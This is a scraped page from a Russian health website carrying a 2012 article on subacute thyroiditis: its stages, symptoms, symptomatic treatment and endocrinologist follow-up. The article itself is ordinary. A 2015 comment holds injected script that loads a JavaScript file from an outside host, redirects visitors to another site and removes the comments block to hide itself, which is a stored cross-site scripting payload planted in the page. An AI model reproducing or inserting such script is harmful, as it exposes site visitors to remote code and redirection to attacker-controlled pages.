Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Воспаление щитовидки: отч...  >>  Воспаление щитовидки: отчего бывают перепады настроения
 
Обратная связь
 

Воспаление щитовидки: отчего бывают перепады настроения

Размер шрифта
24 января 2012 09:00
  • google_analytics: false
  • Нравится

Все трясется, сердце бьется, глаза выскочить хотят. В этом коротком стихотворении почти все симптомы болезни щитовидной железы, когда гормонов так много, что невозможно на месте усидеть. Как распознать и как лечить эту хитрую болезнь?

1

Щитовидная железа продуцирует гормоны, и если она хорошо работает, то самочувствие у человека хорошее. Если же этот орган воспаляется (происходит это, как правило, после вирусной инфекции), человек начинает жаловаться на боль в области шеи. Эти симптомы можно ошибочно принять за симптомы ангины. Симптомы заболевания появляются чуть позже: щитовидная железа увеличивается в размерах и начинает производить избыточное количество гормонов.

1

Течение болезни

  • Первая стадия заболевания начинается с местного воспаления. Больному кажется, что у него болит горло, хотя на самом деле болит в области передней поверхности шеи, а сам зев спокоен. При этом боль может отдаваться в ухо и челюсть и периодически усиливаться.
  • Поднимается температура до 39-40 градусов. Через 7-10 дней фолликул щитовидной железы разрывается и содержимое поступает в ткани. 
  • При повышенном уровне гормонов щитовидной железы человек чувствует гиперактивность, появляется дрожь в руках, учащается сердцебиение, увеличивается потоотделение.
  • После первой стадии болезни наступает вторая, когда человеку, наоборот, гормонов не хватает. И вместо бешенной активности наступает период упадка сил.
  • На последней стадии болезни щитовидная железа возвращается в свое нормальное состояние и начинает производить нормальное количество гормонов.

1

Лечение

  • Обычно тиреоидит проходит через 3-4 месяца, поэтому лечение симптоматическое: противоспалительные препараты, которые уменьшат боль и снимут отек щитовидной железы, а так же лекарства, которые замедляют пульс (бета-блокаторы).
  • В тяжелых случаях назначают глюкокортикоиды – преднизолон по 30 мг в сутки.

Осложнения

Возможно развитие хронической формы. Лица, перенесшие подострый тиреоидит, подлежат наблюдению у эндокринолога в течение 2 лет с динамическим исследованием функции щитовидной железы и контролем ультразвукового сканирования.


Сюжеты по теме:
Воспаление щитовидной железы. Если болит горло – не спешите винить простуду

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Болезни-близнецы. Депрессия и гипотиреоз   Раки, которые мы победили   Коварный гипотиреоз: мифы и реальность   Мифы о йододефиците и йодированной соли  

Слайдшоу

1
Еда, которая угробит вашу щитовидку Почему у вас запор?
Ожирение, усталость – в чем еще виновата щитовидка? Всего 10 секунд скажут, здорова ты или нет
40% лысеющих – женщины! Как не стать лысой Орган, который мешает вам похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.